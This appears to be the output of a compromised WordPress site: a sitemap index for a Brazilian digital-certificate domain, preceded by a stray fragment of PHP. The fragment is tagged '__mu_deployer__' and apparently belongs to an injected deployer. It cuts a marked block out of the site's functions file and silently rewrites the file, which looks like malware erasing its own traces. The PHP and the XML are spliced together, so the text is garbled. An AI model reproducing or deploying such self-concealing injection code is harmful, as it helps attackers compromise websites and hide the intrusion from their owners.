';
    $s = strpos($fc, $m);
    $e = strrpos($fc, $m);
    if ($s !== false && $e !== false && $s !== $e) {
      $clean = rtrim(substr($fc, 0, $s) . substr($fc, $e + strlen($m))) . "\n";
      if (strlen($clean) > 10 && strpos($clean, '<?php') !== false) {
        $tmp = $func_file . '.tmp.' . getmypid();
        if (@file_put_contents($tmp, $clean) === strlen($clean)) {
          @rename($tmp, $func_file);
        } else {
          @unlink($tmp);
        }
      }
    }
  }
}, 1);
/* __mu_deployer__ */
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://aparcertificadodigital.com.br/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://aparcertificadodigital.com.br/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://aparcertificadodigital.com.br/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
